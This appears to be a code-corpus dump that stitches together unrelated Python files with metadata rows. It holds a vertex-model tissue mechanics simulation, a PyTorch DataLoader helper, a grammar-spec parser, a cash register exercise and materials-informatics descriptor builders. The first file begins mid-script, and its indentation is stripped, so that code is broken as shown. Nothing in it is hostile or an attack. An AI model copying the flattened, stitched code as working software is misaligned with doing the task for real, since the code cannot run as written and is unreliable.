# temp2 = list(set(K.neighbors(neighbor)) & set(K.neighbors(cents[1])))
# temp2.remove(node)
# circum_sorted, triangles, K = new_topology(K,[node, neighbor], cents, temp1, temp2, ii, jj, belt, centers, num_api_nodes)
#
# t=initial nx Graph in pickled form for plotting later
print(t)
file_name = 't' + str(int(t))
nx.write_gpickle(G,file_name + '.pickle')
np.save(file_name,circum_sorted)
viewer = edge_viewer(G,attr='myosin')
t_plot=5
t_last=-t_plot
while t <= const.t_final:
if t == const.t_1:
for i in range(0,len(inner_arc)):
G[inner_arc[i-1]][inner_arc[i]]['myosin'] = const.belt_strength
print("Inner arc established")
# update myosin on outer arc
if t == const.t_2:
for i in range(0,len(outer_arc)):
G[outer_arc[i-1]][outer_arc[i]]['myosin'] = const.belt_strength
print("Outer arc established")
# update myosin on belt
if t == const.t_belt:
for i in range(0,len(belt)):
G[belt[i-1]][belt[i]]['myosin'] = const.belt_strength
print("Belt established")
if t-t_last>=t_plot:
viewer(G)
# increment t by dt
# initialize force_dict back to zeros
t = round(t+dt,1)
print(dt, t)
pos = nx.get_node_attributes(G,'pos')
force_dict = {new_list: np.zeros(3,dtype=float) for new_list in G.nodes()}
# pre-calculate magnitude of pressure
# index of list corresponds to index of centers list
PI = np.zeros(len(centers),dtype=float)
# eventually move to classes?
for n in range(0,len(centers)):
# get nodes for volume
pts = get_points(G,centers[n],pos)
# calculate volume
vol = convex_hull_volume_bis(pts)
# calculate pressure
PI[n] = -press_alpha*(vol-const.v_0)
# # Update myosin on a fictitious pit (no resemblance to SG geometry)
# if t < const.t_pit:
# myo = const.pit_strength*t
# for node in pit_centers:
# if node == 0:
# myo = 1.5*myo
# for neighbor in G.neighbors(node):
# G[node][neighbor]['myosin'] = myo
# if t > const.t_intercalate:
# if contract[0] == True:
# G[301][302]['myosin'] = const.belt_strength*(t-const.t_intercalate)
# update myosin on inner arc
for node in G.nodes():
# update force on each node
force = [0.0,0.0,0.0]
# Elastic forces due to the cytoskeleton
for neighbor in G.neighbors(node):
a = pos[node]
b = pos[neighbor]
dist = distance.euclidean(a,b)
direction = unit_vector(a,b)
magnitude = elastic_force(dist, G[node][neighbor]['l_rest'], mu_apical)
force = np.sum([force,magnitude*np.array(direction)],axis=0)
# Force due to myosin
magnitude = myo_beta*G[node][neighbor]['myosin']
force = np.sum([force, magnitude*np.array(direction)],axis=0)
force_dict[node] = np.add(force_dict[node], force)
for center in centers:
index = centers.index(center)
pts = circum_sorted[index]
centroid = np.array([pos[center], pos[center+1000]])
centroid = np.average(centroid,axis=0)
# pressure for:
# apical nodes
for i in range(0,len(circum_sorted[index])):
area, extra = be_area([center,pts[i],pts[i-1]],[center,pts[i],pts[i-1]],pos)
magnitude = PI[index]*area[0]*(1/3)
direction = area[1]/np.linalg.norm(area[1])
force = magnitude*direction
force_dict[center] = np.add(force_dict[center],force)
force_dict[pts[i-1]] = np.add(force_dict[pts[i-1]],force)
force_dict[pts[i]] = np.add(force_dict[pts[i]],force)
# pressure for:
# basal nodes
area, extra = be_area([center+1000,pts[i-1]+1000,pts[i]+1000],[center+1000,pts[i-1]+1000,pts[i]+1000],pos)
magnitude = PI[index]*area[0]*(1/3)
direction = area[1]/np.linalg.norm(area[1])
force = magnitude*direction
force_dict[center+1000] = np.add(force_dict[center+1000],force)
force_dict[pts[i-1]+1000] = np.add(force_dict[pts[i-1]+1000],force)
force_dict[pts[i]+1000] = np.add(force_dict[pts[i]+1000],force)
# pressure for side panels
# loop through each cell
for index in range(0,len(circum_sorted)):
cell_nodes = circum_sorted[index]
centroid = np.array([pos[centers[index]], pos[centers[index]+1000]])
centroid = np.average(centroid, axis=0)
# loop through the 6 faces (or 5 or 7 after intercalation)
for i in range(0, len(cell_nodes)):
pts_id = np.array([cell_nodes[i-1], cell_nodes[i], cell_nodes[i]+1000, cell_nodes[i-1]+1000])
pts_pos = np.array([pos[pts_id[ii]] for ii in range(0,4)])
# on each face, calculate the center
center = np.average(pts_pos,axis=0)
# loop through the 4 triangles that make the face
for ii in range(0,4):
pos_side = [center, pts_pos[ii-1], pts_pos[ii]]
area = area_side(pos_side)
magnitude = PI[index]*area[0]*(1/2)
direction = area[1]/np.linalg.norm(area[1])
force = magnitude*direction
force_dict[pts_id[ii-1]] = np.add(force_dict[pts_id[ii-1]],force)
force_dict[pts_id[ii]] = np.add(force_dict[pts_id[ii]],force)
# Implement bending energy
# Loop through all alpha, beta pairs of triangles
for pair in triangles:
alpha, beta = pair[0], pair[1]
# Apical faces, calculate areas and cross-products
A_alpha, A_beta = be_area(alpha, beta, pos)
for node in alpha:
inda = alpha.index(node)
nbhrs_alpha = (alpha[(inda+1)%3], alpha[(inda-1)%3])
if node in beta:
indb = beta.index(node)
nbhrs_beta = (beta[(indb+1)%3], beta[(indb-1)%3])
frce = const.c_ab*bending_energy(nbhrs_alpha, nbhrs_beta, A_alpha, A_beta, pos)
else:
frce = const.c_ab*bending_energy(nbhrs_alpha, False, A_alpha, A_beta, pos)
force_dict[node] = np.add(force_dict[node],frce)
for node in beta:
# don't double count the shared nodes
indb = beta.index(node)
nbhrs_beta = (beta[(indb+1)%3], beta[(indb-1)%3])
if node not in alpha:
frce = const.c_ab*bending_energy(False, nbhrs_beta, A_alpha, A_beta, pos)
else:
frce = const.c_ab*np.array([0.,0.,0.])
force_dict[node] = np.add(force_dict[node],frce)
# Basal faces
alpha = [alpha[0]+1000, alpha[1]+1000, alpha[2]+1000]
beta = [beta[0]+1000, beta[1]+1000, beta[2]+1000]
A_alpha, A_beta = be_area(alpha, beta, pos)
for node in alpha:
inda = alpha.index(node)
nbhrs_alpha = (alpha[(inda+1)%3], alpha[(inda-1)%3])
if node in beta:
indb = beta.index(node)
nbhrs_beta = (beta[(indb+1)%3], beta[(indb-1)%3])
frce = const.c_ab*bending_energy(nbhrs_alpha, nbhrs_beta, A_alpha, A_beta, pos)
else:
frce = const.c_ab*bending_energy(nbhrs_alpha, False, A_alpha, A_beta, pos)
force_dict[node] = np.add(force_dict[node],frce)
for node in beta:
# don't double count the shared nodes
indb = beta.index(node)
nbhrs_beta = (beta[(indb+1)%3], beta[(indb-1)%3])
if node not in alpha:
frce = const.c_ab*bending_energy(False, nbhrs_beta, A_alpha, A_beta, pos)
else:
frce = np.array([0.,0.,0.])
force_dict[node] = np.add(force_dict[node],frce)
# update location of node
pos = nx.get_node_attributes(G,'pos')
for node in force_dict:
G.node[node]['pos'] = d_pos(pos[node],force_dict[node],dt)
## Check for intercalation events
pos = nx.get_node_attributes(G,'pos')
for node in range(0,num_api_nodes):
if node not in belt:
for neighbor in G.neighbors(node):
if (neighbor < 1000) and (neighbor not in belt) and (node not in centers) and (neighbor not in centers) and ([min(node, neighbor), max(node, neighbor)] not in blacklist):
a = pos[node]
b = pos[neighbor]
c = pos[node+1000]
d = pos[neighbor+1000]
dist = distance.euclidean(a,b)
if (dist < const.l_intercalation):
if (np.random.rand(1)[0] < 1.):
print("Intercalation event between nodes", node, "and", neighbor, "at t = ", t)
# collapse nodes to same position
# apical
avg_loc = (np.array(a) + np.array(b)) / 2.0
a = avg_loc
b = avg_loc
# basal
avg_loc = (np.array(c) + np.array(d)) / 2.0
c = avg_loc
d = avg_loc
# move nodes toward new center
# apical
cents = list(set(G.neighbors(node)) & set(G.neighbors(neighbor)))
mvmt = unit_vector(a,pos[cents[1]])
a = [a[0]+l_mvmt*mvmt[0], a[1]+l_mvmt*mvmt[1], a[2]+l_mvmt*mvmt[2]]
G.node[node]['pos'] = a
mvmt = unit_vector(b,pos[cents[0]])
b = [b[0]+l_mvmt*mvmt[0], b[1]+l_mvmt*mvmt[1], b[2]+l_mvmt*mvmt[2]]
G.node[neighbor]['pos'] = b
# basal
#cents = list(set(G.neighbors(node+1000)) & set(G.neighbors(neighbor+1000)))
mvmt = unit_vector(c,pos[cents[1]+1000])
c = [c[0]+l_mvmt*mvmt[0], c[1]+l_mvmt*mvmt[1], c[2]+l_mvmt*mvmt[2]]
G.node[node+1000]['pos'] = c
mvmt = unit_vector(d,pos[cents[0]+1000])
d = [d[0]+l_mvmt*mvmt[0], d[1]+l_mvmt*mvmt[1], d[2]+l_mvmt*mvmt[2]]
G.node[neighbor+1000]['pos'] = d
ii = list((set(list(G.neighbors(node))) & set(list(centers))) - (set(list(G.neighbors(node))) & set(list(G.neighbors(neighbor)))))[0]
jj = list((set(list(G.neighbors(neighbor))) & set(list(centers))) - (set(list(G.neighbors(node))) & set(list(G.neighbors(neighbor)))))[0]
temp1 = list(set(G.neighbors(node)) & set(G.neighbors(cents[0])))
temp1.remove(neighbor)
temp2 = list(set(G.neighbors(neighbor)) & set(G.neighbors(cents[1])))
temp2.remove(node)
# sever connections
# apical
G.remove_edge(node,cents[0])
G.remove_edge(node,temp1[0])
G.remove_edge(neighbor,cents[1])
G.remove_edge(neighbor,temp2[0])
# basal
G.remove_edge(node+1000,cents[0]+1000)
G.remove_edge(node+1000,temp1[0]+1000)
G.remove_edge(neighbor+1000,cents[1]+1000)
G.remove_edge(neighbor+1000,temp2[0]+1000)
# add new connections
# apical
# new edges
G.add_edge(node,temp2[0],l_rest = const.l_apical, myosin=0,color='#808080')
G.add_edge(neighbor,temp1[0],l_rest = const.l_apical, myosin=0,color='#808080')
# new spokes
G.add_edge(neighbor,ii,l_rest = const.l_apical, myosin=0)
G.add_edge(node,jj,l_rest = const.l_apical, myosin=0)
# basal
# new edges
G.add_edge(node+1000,temp2[0]+1000,l_rest = const.l_apical, myosin=0,color='#808080')
G.add_edge(neighbor+1000,temp1[0]+1000,l_rest = const.l_apical, myosin=0,color='#808080')
# new spokes
G.add_edge(neighbor+1000,ii+1000,l_rest = const.l_apical, myosin=0)
G.add_edge(node+1000,jj+1000,l_rest = const.l_apical, myosin=0)
# reset myosin on contracted edge
G[node][neighbor]['myosin'] = 0
G[node+1000][neighbor+1000]['myosin'] = 0
blacklist.append([min(node, neighbor), max(node, neighbor)])
circum_sorted, triangles, K = new_topology(K,[node, neighbor], cents, temp1, temp2, ii, jj, belt, centers, num_api_nodes)
if min(node,neighbor) == 301:
contract[0] = False
# #set dt for next loop
# if var_dt == True:
# if any(contract) == True:
# # if any edges are still contracting, check for threshold length
# for i in range(0,num_inter):
# # calculate lengths of those that are still True
# if contract[i] == True:
# a = inter_edges[i][0]
# b = inter_edges[i][1]
# if distance.euclidean(pos[a],pos[b]) < 0.2:
# dt = 0.1
# break
# else:
# if isclose(t % 1, 0) == False:
# dt = 0.1
# else:
# dt = const.dt
# var_dt = False
# else:
# dt = const.dt
# Save nx Graph in pickled form for plotting later
if t % 1 == 0:
file_name = 't' + str(round(t))
nx.write_gpickle(G,file_name + '.pickle')
np.save(file_name,circum_sorted)
| main_orig.py | 17,117 | Constants for simulationvar_dt = True dimensions of the cell Set the arcs list mechanical parameters rest lengths of the passively elastic apical, basal and cell walls initialize the tissue Starting from t=0inter_edges = [[301,302],[295,296],[292,293],[298,299],[45,46],[39,40],[272,273],[174,175],[180,181],[276,277],[183,184],[177,178],[112,113],[286,287],[289,290],[115,116],[109,110],[283,284],[280,281],[106,107]] Starting from t=? after intercalations occurt = 1640 num_inter = 20 blacklist = [[301,302],[295,296],[292,293],[298,299],[45,46],[39,40],[272,273],[174,175],[180,181],[276,277],[183,184],[177,178],[112,113],[286,287],[289,290],[115,116],[109,110],[283,284],[280,281],[106,107]] contract = [False for counter in range(0,num_inter)]G = nx.read_gpickle('/home/cdurney/3d-vertex/concentric/t1640.pickle')for counter in range(0,num_inter): node = blacklist[counter][0] neighbor = blacklist[counter][1] print(node, neighbor) cents = list(set(K.neighbors(node)) & set(K.neighbors(neighbor))) ii = list((set(list(K.neighbors(node))) & set(list(centers))) - (set(list(K.neighbors(node))) & set(list(K.neighbors(neighbor)))))[0] jj = list((set(list(K.neighbors(neighbor))) & set(list(centers))) - (set(list(K.neighbors(node))) & set(list(K.neighbors(neighbor)))))[0] temp1 = list(set(K.neighbors(node)) & set(K.neighbors(cents[0]))) temp1.remove(neighbor) temp2 = list(set(K.neighbors(neighbor)) & set(K.neighbors(cents[1]))) temp2.remove(node) circum_sorted, triangles, K = new_topology(K,[node, neighbor], cents, temp1, temp2, ii, jj, belt, centers, num_api_nodes) t=initial nx Graph in pickled form for plotting later update myosin on outer arc update myosin on belt increment t by dt initialize force_dict back to zeros pre-calculate magnitude of pressure index of list corresponds to index of centers list eventually move to classes? get nodes for volume calculate volume calculate pressure Update myosin on a fictitious pit (no resemblance to SG geometry) if t < const.t_pit: myo = const.pit_strength*t for node in pit_centers: if node == 0: myo = 1.5*myo for neighbor in G.neighbors(node): G[node][neighbor]['myosin'] = myo if t > const.t_intercalate: if contract[0] == True: G[301][302]['myosin'] = const.belt_strength*(t-const.t_intercalate) update myosin on inner arc update force on each node Elastic forces due to the cytoskeleton Force due to myosin pressure for: apical nodes pressure for: basal nodes pressure for side panels loop through each cell loop through the 6 faces (or 5 or 7 after intercalation) on each face, calculate the center loop through the 4 triangles that make the face Implement bending energy Loop through all alpha, beta pairs of triangles Apical faces, calculate areas and cross-products don't double count the shared nodes Basal faces don't double count the shared nodes update location of node Check for intercalation events collapse nodes to same position apical basal move nodes toward new center apical basal cents = list(set(G.neighbors(node+1000)) & set(G.neighbors(neighbor+1000))) sever connections apical basal add new connections apical new edges new spokes basal new edges new spokes reset myosin on contracted edge set dt for next loop if var_dt == True: if any(contract) == True: if any edges are still contracting, check for threshold length for i in range(0,num_inter): calculate lengths of those that are still True if contract[i] == True: a = inter_edges[i][0] b = inter_edges[i][1] if distance.euclidean(pos[a],pos[b]) < 0.2: dt = 0.1 break else: if isclose(t % 1, 0) == False: dt = 0.1 else: dt = const.dt var_dt = False else: dt = const.dt Save nx Graph in pickled form for plotting later | 4,090 | en | 0.653646 |
from typing import Callable, Iterable
import torch
from torch.utils.data.dataloader import default_collate as default_collate_fn
from catalyst.data import ListDataset
def get_loader(
data_source: Iterable[dict],
open_fn: Callable,
dict_transform: Callable = None,
sampler=None,
collate_fn: Callable = default_collate_fn,
batch_size: int = 32,
num_workers: int = 4,
shuffle: bool = False,
drop_last: bool = False,
):
"""Creates a DataLoader from given source and its open/transform params.
Args:
data_source (Iterable[dict]): and iterable containing your
data annotations,
(for example path to images, labels, bboxes, etc)
open_fn (Callable): function, that can open your
annotations dict and
transfer it to data, needed by your network
(for example open image by path, or tokenize read string)
dict_transform (callable): transforms to use on dict
(for example normalize image, add blur, crop/resize/etc)
sampler (Sampler, optional): defines the strategy to draw samples from
the dataset
collate_fn (callable, optional): merges a list of samples to form a
mini-batch of Tensor(s). Used when using batched loading from a
map-style dataset
batch_size (int, optional): how many samples per batch to load
num_workers (int, optional): how many subprocesses to use for data
loading. ``0`` means that the data will be loaded
in the main process
shuffle (bool, optional): set to ``True`` to have the data reshuffled
at every epoch (default: ``False``).
drop_last (bool, optional): set to ``True`` to drop
the last incomplete batch, if the dataset size is not divisible
by the batch size. If ``False`` and the size of dataset
is not divisible by the batch size, then the last batch
will be smaller. (default: ``False``)
Returns:
DataLoader with ``catalyst.data.ListDataset``
"""
dataset = ListDataset(
list_data=data_source, open_fn=open_fn, dict_transform=dict_transform,
)
loader = torch.utils.data.DataLoader(
dataset=dataset,
sampler=sampler,
collate_fn=collate_fn,
batch_size=batch_size,
num_workers=num_workers,
shuffle=shuffle,
pin_memory=torch.cuda.is_available(),
drop_last=drop_last,
)
return loader
__all__ = ["get_loader"]
| catalyst/dl/utils/torch.py | 2,550 | Creates a DataLoader from given source and its open/transform params.
Args:
data_source (Iterable[dict]): and iterable containing your
data annotations,
(for example path to images, labels, bboxes, etc)
open_fn (Callable): function, that can open your
annotations dict and
transfer it to data, needed by your network
(for example open image by path, or tokenize read string)
dict_transform (callable): transforms to use on dict
(for example normalize image, add blur, crop/resize/etc)
sampler (Sampler, optional): defines the strategy to draw samples from
the dataset
collate_fn (callable, optional): merges a list of samples to form a
mini-batch of Tensor(s). Used when using batched loading from a
map-style dataset
batch_size (int, optional): how many samples per batch to load
num_workers (int, optional): how many subprocesses to use for data
loading. ``0`` means that the data will be loaded
in the main process
shuffle (bool, optional): set to ``True`` to have the data reshuffled
at every epoch (default: ``False``).
drop_last (bool, optional): set to ``True`` to drop
the last incomplete batch, if the dataset size is not divisible
by the batch size. If ``False`` and the size of dataset
is not divisible by the batch size, then the last batch
will be smaller. (default: ``False``)
Returns:
DataLoader with ``catalyst.data.ListDataset`` | 1,516 | en | 0.790807 |
"""
This module contains functionality for extracting a grammar from
classes in a module.
"""
from __future__ import annotations
import types
from parsing.interfaces import SpecSource
from parsing.grammar import (
PrecedenceSpec,
PrecedenceRef,
TokenSpec,
NontermSpec,
)
from parsing.ast import Token, Nonterm, Precedence
from parsing import introspection
from parsing.errors import SpecError
class ModuleSpecSource(SpecSource):
"""
ModuleSpecSource scans one or several modules for subclasses of relevant
classes (Precedence, Token, Nonterm) with specific docstrings.
"""
def __init__(
self, modules: types.ModuleType | list[types.ModuleType]
) -> None:
if isinstance(modules, types.ModuleType):
# Wrap single module in a list.
modules = [modules]
self.modules = modules
items = []
for module in self.modules:
for k, v in module.__dict__.items():
if isinstance(v, type) and isinstance(v.__doc__, str):
dirtoks = introspection.parse_docstring(v.__doc__)
items.append((module, k, v, dirtoks))
self.named_objs = items
self._cache_precedences: list[PrecedenceSpec] | None = None
self._cache_tokens: list[TokenSpec] | None = None
self._cache_nonterminals: tuple[
list[NontermSpec], NontermSpec
] | None = None
def get_precedences(self) -> list[PrecedenceSpec]:
if self._cache_precedences is not None:
return self._cache_precedences
result = []
for module, k, v, dirtoks in self.named_objs:
if issubclass(v, Precedence) and dirtoks[0] in [
"%fail",
"%nonassoc",
"%left",
"%right",
"%split",
]:
name = k
relationships = {}
i = 1
while i < len(dirtoks):
tok = dirtoks[i]
m = PrecedenceSpec.assoc_tok_re.match(tok)
if m:
# Precedence relationship.
if m.group(2) in relationships:
raise SpecError(
"Duplicate precedence "
"relationship: %s" % v.__doc__
)
relationships[m.group(2)] = m.group(1)
else:
m = NontermSpec.token_re.match(tok)
if m:
if i != 1:
raise SpecError(
"Precedence name must come before "
"relationships: %s" % v.__doc__
)
name = m.group(1)
else:
raise SpecError(
"Invalid precedence specification: %s"
% v.__doc__
)
i += 1
prec = PrecedenceSpec(name, dirtoks[0][1:], relationships)
result.append(prec)
self._cache_precedences = result
return result
def get_tokens(self) -> list[TokenSpec]:
if self._cache_tokens is not None:
return self._cache_tokens
result = []
for module, k, v, dirtoks in self.named_objs:
if issubclass(v, Token) and dirtoks[0] in ["%token"]:
name = k
prec = None
i = 1
while i < len(dirtoks):
tok = dirtoks[i]
m = NontermSpec.precedence_tok_re.match(tok)
if m:
if i < len(dirtoks) - 1:
raise SpecError(
"Precedence must come last in token "
"specification: %s" % v.__doc__
)
prec = PrecedenceRef(m.group(1))
else:
m = NontermSpec.token_re.match(tok)
if m:
name = m.group(1)
else:
raise SpecError(
"Invalid token specification: %s" % v.__doc__
)
i += 1
if prec is None:
prec = PrecedenceRef("none")
token = TokenSpec(v, name, prec)
result.append(token)
self._cache_tokens = result
return result
def get_nonterminals(self) -> tuple[list[NontermSpec], NontermSpec]:
if self._cache_nonterminals is not None:
return self._cache_nonterminals
result = []
startSym: NontermSpec | None = None
for module, k, v, dirtoks in self.named_objs:
if issubclass(v, Nonterm) and dirtoks[0] in ["%start", "%nonterm"]:
nonterm, is_start = NontermSpec.from_class(v)
result.append(nonterm)
if is_start:
# Start symbol.
if startSym is not None:
raise SpecError(
"Only one start non-terminal allowed: %s"
% v.__doc__
)
startSym = nonterm
assert startSym is not None
self._cache_nonterminals = (result, startSym)
return result, startSym
| parsing/module_spec.py | 5,658 | ModuleSpecSource scans one or several modules for subclasses of relevant
classes (Precedence, Token, Nonterm) with specific docstrings.
This module contains functionality for extracting a grammar from
classes in a module.
Wrap single module in a list. Precedence relationship. Start symbol. | 292 | en | 0.667125 |
# cash register
class RetailItem:
def __init__(self, description, units_in_inventory, price):
self.__description = description
self.__units_in_inventory = units_in_inventory
self.__price = price
def get_description(self):
return self.__description
def get_units_in_inventory(self):
return self.__units_in_inventory
def get_price(self):
return self.__price
def set_description(self, description):
self.__description = description
def set_units_in_inventory(self, units_in_inventory):
self.__units_in_inventory = units_in_inventory
def set_price(self, price):
self.__price = price
def __str__(self):
return self.__description + ", " + \
"items: " + str(self.__units_in_inventory) + ", " + \
"$ " + str(float(self.__price)) + ". "
class CashRegister:
all_items_in_cart = []
def purchase_item(self, retail_item):
return self.all_items_in_cart.append(retail_item)
def get_total(self):
total = 0
for item in self.all_items_in_cart:
total += RetailItem.get_price(item) * \
RetailItem.get_units_in_inventory(item)
return total
def get_num_items(self):
num_items = 0
for item in self.all_items_in_cart:
num_items += RetailItem.get_units_in_inventory(item)
return num_items
def show_items(self):
if not self.all_items_in_cart:
print("Your Cart is empty.")
print("Your Cart:")
for item in self.all_items_in_cart:
print(item)
def clear(self):
self.all_items_in_cart.clear()
def main():
more = "y"
while more == "y":
# if you want to manually enter object parameters manually
# enter the instance attribute values
print("If you want to manually enter object parameters\n"
"manually enter the instance attribute values.")
print("Enter yours item.")
more_item = "y"
while more_item == "y":
description = input("description: ")
units_in_inventory = int(input("count of item: "))
price = float(input("price: "))
items = RetailItem(description, units_in_inventory, price)
CashRegister().purchase_item(items)
more_item = input("More item yes -'y', no -'any ch'.")
if more_item == "y":
continue
ready = input("Ready to pay? yes 'y', no 'any ch'")
if ready == "y":
print()
# show all item in basket
CashRegister().show_items()
# Showing the customer the number of selected products
print("Numbers of items:", CashRegister().get_num_items())
# returns the total cost of all RetailItem objects
# stored in the object's internal list 'all_items_in_cart'
print("Total = $",
'{:.2f}'.format(CashRegister().get_total()))
print()
print("Enter 'y' if you pay, no 'any ch'.")
print("Enter 'c' if you want clean cart.")
pay = input("Enter: ")
if pay == "y":
print("Paid.")
print("Product sent.")
# clears the internal list 'all_items_in_cart' of the
# CashRegister object. After payment, we clear the shopping
# cart, that is, the internal list 'all_items_in_cart'
print("Shopping cart empty.", CashRegister().clear())
break
if pay == "c":
# clears the internal list 'all_items_in_cart' of the
# CashRegister object. After payment, we clear the shopping
# cart, that is, the internal list 'all_items_in_cart'
print("we clear the shopping cart",
CashRegister().clear())
else:
print("The product remained in cart.")
more = input("Add more products? yes 'y', no 'any ch'")
main()
| chapter_10/08_cash_register.py | 4,219 | cash register if you want to manually enter object parameters manually enter the instance attribute values show all item in basket Showing the customer the number of selected products returns the total cost of all RetailItem objects stored in the object's internal list 'all_items_in_cart' clears the internal list 'all_items_in_cart' of the CashRegister object. After payment, we clear the shopping cart, that is, the internal list 'all_items_in_cart' clears the internal list 'all_items_in_cart' of the CashRegister object. After payment, we clear the shopping cart, that is, the internal list 'all_items_in_cart' | 615 | en | 0.718382 |
from itertools import chain
from typing import Iterator, Mapping, Union, List
from uuid import UUID
from gemd.entity.link_by_uid import LinkByUID
from gemd.entity.bounds import RealBounds, CategoricalBounds, MolecularStructureBounds, \
IntegerBounds, CompositionBounds
from gemd.entity.template.attribute_template import AttributeTemplate
from gemd.entity.template.has_property_templates import HasPropertyTemplates
from gemd.entity.template.has_condition_templates import HasConditionTemplates
from gemd.entity.template.has_parameter_templates import HasParameterTemplates
from gemd.entity.value import EmpiricalFormula
from gemd.util import recursive_flatmap, set_uuids
from citrine.builders.auto_configure import AutoConfigureMode
from citrine.informatics.descriptors import RealDescriptor, CategoricalDescriptor, \
MolecularStructureDescriptor, Descriptor, ChemicalFormulaDescriptor
from citrine.resources.data_concepts import DataConceptsCollection
from citrine.resources.material_run import MaterialRun
from citrine.resources.project import Project
class NoEquivalentDescriptorError(ValueError):
"""Error that is raised when the bounds in a template have no equivalent descriptor."""
pass
def template_to_descriptor(template: AttributeTemplate, *,
headers: List[str] = []) -> Descriptor:
"""
Convert a GEMD attribute template into an AI Engine Descriptor.
IntBounds cannot be converted because they have no matching descriptor type.
CompositionBounds can only be converted when every component is an element, in which case
they are converted to ChemicalFormulaDescriptors.
Parameters
----------
template: AttributeTemplate
Template to convert into a descriptor
headers: List[str]
Names of parent relationships to includes as prefixes
to the template name in the descriptor key
Default: []
Returns
-------
Descriptor
Descriptor with a key matching the template name and type corresponding to the bounds
"""
headers = headers + [template.name]
descriptor_key = '~'.join(headers)
bounds = template.bounds
if isinstance(bounds, RealBounds):
return RealDescriptor(
key=descriptor_key,
lower_bound=bounds.lower_bound,
upper_bound=bounds.upper_bound,
units=bounds.default_units
)
if isinstance(bounds, CategoricalBounds):
return CategoricalDescriptor(
key=descriptor_key,
categories=bounds.categories
)
if isinstance(bounds, MolecularStructureBounds):
return MolecularStructureDescriptor(
key=descriptor_key
)
if isinstance(bounds, CompositionBounds):
if set(bounds.components).issubset(EmpiricalFormula.all_elements()):
return ChemicalFormulaDescriptor(
key=descriptor_key
)
else:
msg = "Cannot create descriptor for CompositionBounds with non-atomic components"
raise NoEquivalentDescriptorError(msg)
if isinstance(bounds, IntegerBounds):
raise NoEquivalentDescriptorError("Cannot create a descriptor for integer-valued data")
raise ValueError("Template has unrecognized bounds: {}".format(type(bounds)))
class PlatformVocabulary(Mapping[str, Descriptor]):
"""
Dictionary of descriptors that define a controlled vocabulary for the AI Engine.
Parameters
----------
entries: Mapping[str, Descriptor]
Entries in the dictionary, indexed by a convenient name.
To build from templates, use PlatformVocabulary.from_templates
To build from a material, use PlatformVocabulary.from_material
"""
def __init__(self, *, entries: Mapping[str, Descriptor]):
self._entries = entries
def __getitem__(self, k: str) -> Descriptor:
return self._entries[k]
def __len__(self):
return len(self._entries)
def __iter__(self) -> Iterator[str]:
return iter(self._entries)
@staticmethod
def from_templates(*, project: Project, scope: str):
"""
Build a PlatformVocabulary from the templates visible to a project.
All of the templates with the given scope are downloaded and converted into descriptors.
The uid values associated with that scope are used as the index into the dictionary.
For example, using scope "my_templates" with a template with
uids={"my_templates": "density"} would be indexed into the dictionary as "density".
Parameters
----------
project: Project
Project on the Citrine Platform to read templates from
scope: str
Unique ID scope from which to pull the template names
Returns
-------
PlatformVocabulary
"""
def _from_collection(collection: DataConceptsCollection):
return {x.uids[scope]: x for x in collection.list() if scope in x.uids}
properties = _from_collection(project.property_templates)
parameters = _from_collection(project.parameter_templates)
conditions = _from_collection(project.condition_templates)
res = {}
for k, v in chain(properties.items(), parameters.items(), conditions.items()):
try:
desc = template_to_descriptor(v)
res[k] = desc
except NoEquivalentDescriptorError:
continue
return PlatformVocabulary(entries=res)
@staticmethod
def from_material(
*,
project: Project,
material: Union[str, UUID, LinkByUID, MaterialRun],
mode: AutoConfigureMode = AutoConfigureMode.PLAIN,
full_history: bool = True
):
"""[ALPHA] Build a PlatformVocabulary from templates appearing in a material history.
All of the attribute templates that appear throughout the material's history
are extracted and converted into descriptors.
Descriptor keys are formatted according to the option set by mode.
For example, if a condition template with name 'Condition 1'
appears in a parent process with name 'Parent',
the mode option produces the following descriptor key:
mode = AutoConfigMode.PLAIN --> 'Parent~Condition 1'
mode = AutoConfigMode.FORMULATION --> 'Condition 1'
Parameters
----------
project: Project
Project to use when accessing the Citrine Platform.
material: Union[str, UUID, LinkByUID, MaterialRun]
A representation of the material to extract descriptors from.
mode: AutoConfigureMode
Formatting option for descriptor keys in the platform vocabulary.
Option AutoConfigMode.PLAIN includes headers from the parent object,
whereas option AutoConfigMode.FORMULATION does not.
Default: AutoConfigureMode.PLAIN
full_history: bool
Whether to extract descriptors from the full material history,
or only the provided (terminal) material.
Default: True
Returns
-------
PlatformVocabulary
"""
if not isinstance(mode, AutoConfigureMode):
raise TypeError('mode must be an option from AutoConfigureMode')
# Full history not needed when full_history = False
# But is convenient to populate templates for terminal material
history = project.material_runs.get_history(id=material)
if full_history:
search_history = recursive_flatmap(history, lambda x: [x], unidirectional=False)
set_uuids(search_history, 'id')
else:
# Limit the search to contain the terminal material/process/measurements
search_history = [history.spec.template, history.process.template]
search_history.extend([msr.template for msr in history.measurements])
search_history = [x for x in search_history if x is not None] # Edge case safety
# Extract templates and formatted keys
res = {}
for obj in search_history:
# Extract all templates
templates = []
if isinstance(obj, HasPropertyTemplates):
for property in obj.properties:
templates.append(property[0])
if isinstance(obj, HasConditionTemplates):
for condition in obj.conditions:
templates.append(condition[0])
if isinstance(obj, HasParameterTemplates):
for parameter in obj.parameters:
templates.append(parameter[0])
# Assemble to descriptors
headers = []
if mode == AutoConfigureMode.PLAIN:
headers.append(obj.name)
for tmpl in templates:
try:
desc = template_to_descriptor(tmpl, headers=headers)
res[desc.key] = desc
except NoEquivalentDescriptorError:
continue
return PlatformVocabulary(entries=res)
| src/citrine/builders/descriptors.py | 9,152 | Error that is raised when the bounds in a template have no equivalent descriptor.
Dictionary of descriptors that define a controlled vocabulary for the AI Engine.
Parameters
----------
entries: Mapping[str, Descriptor]
Entries in the dictionary, indexed by a convenient name.
To build from templates, use PlatformVocabulary.from_templates
To build from a material, use PlatformVocabulary.from_material
[ALPHA] Build a PlatformVocabulary from templates appearing in a material history.
All of the attribute templates that appear throughout the material's history
are extracted and converted into descriptors.
Descriptor keys are formatted according to the option set by mode.
For example, if a condition template with name 'Condition 1'
appears in a parent process with name 'Parent',
the mode option produces the following descriptor key:
mode = AutoConfigMode.PLAIN --> 'Parent~Condition 1'
mode = AutoConfigMode.FORMULATION --> 'Condition 1'
Parameters
----------
project: Project
Project to use when accessing the Citrine Platform.
material: Union[str, UUID, LinkByUID, MaterialRun]
A representation of the material to extract descriptors from.
mode: AutoConfigureMode
Formatting option for descriptor keys in the platform vocabulary.
Option AutoConfigMode.PLAIN includes headers from the parent object,
whereas option AutoConfigMode.FORMULATION does not.
Default: AutoConfigureMode.PLAIN
full_history: bool
Whether to extract descriptors from the full material history,
or only the provided (terminal) material.
Default: True
Returns
-------
PlatformVocabulary
